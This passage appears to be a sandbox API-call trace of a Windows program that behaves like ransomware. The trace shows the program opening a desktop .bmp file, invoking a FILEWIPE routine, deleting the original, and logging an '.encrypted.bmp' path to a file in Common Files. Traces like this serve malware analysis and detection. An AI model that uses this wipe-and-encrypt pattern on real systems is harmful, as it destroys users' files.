wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.799] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.799] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x1b6ea610, ftLastWriteTime.dwHighDateTime=0x1d5c16d, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0x7c2100 [0030.800] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0030.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.800] CharLowerBuffW (in: lpsz="byte[74164]", cchLength=0xb | out: lpsz="byte[74164]") returned 0xb [0030.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.801] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.801] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.801] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.801] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.802] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.803] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.803] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\mq1qqynaiw1i2bdfj.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0030.804] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.804] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.804] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.804] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.804] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.804] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0030.804] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.804] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.805] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.805] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.805] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.805] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.805] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpFilePart=0x0) returned 0x54 [0030.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x123f7a40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0x7c2100 [0030.805] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\mq1qqynaiw1i2bdfj.bmp")) returned 1 [0030.807] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c499ca0, ftCreationTime.dwHighDateTime=0x1d5c5db, ftLastAccessTime.dwLowDateTime=0x1b6ea610, ftLastAccessTime.dwHighDateTime=0x1d5c16d, ftLastWriteTime.dwLowDateTime=0x123f7a40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x121b4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="mq1QQyNAiW1I2BdfJ.bmp", cAlternateFileName="MQ1QQY~1.BMP")) returned 0 [0030.807] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.807] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.807] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.807] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.807] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0030.807] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.808] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0030.808] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0030.808] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.808] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.808] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0030.808] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.808] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0030.809] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x535, lpOverlapped=0x0) returned 1 [0030.809] ReadFile (in: hFile=0x140, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0030.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x535, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.809] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0030.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.809] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0030.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.encrypted.bmp\r\n", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0030.809] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61) returned 0x7c10a8 [0030.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.encrypted.bmp\r\n", cchWideChar=97, lpMultiByteStr=0x7c10a8, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 97 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0030.810] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0030.810] WriteFile (in: hFile=0x140, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x60, lpOverlapped=0x0) returned 1 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0030.810] CloseHandle (hObject=0x140) returned 1 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.810] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.812] HeapFree (in: hHeap=0x770000, 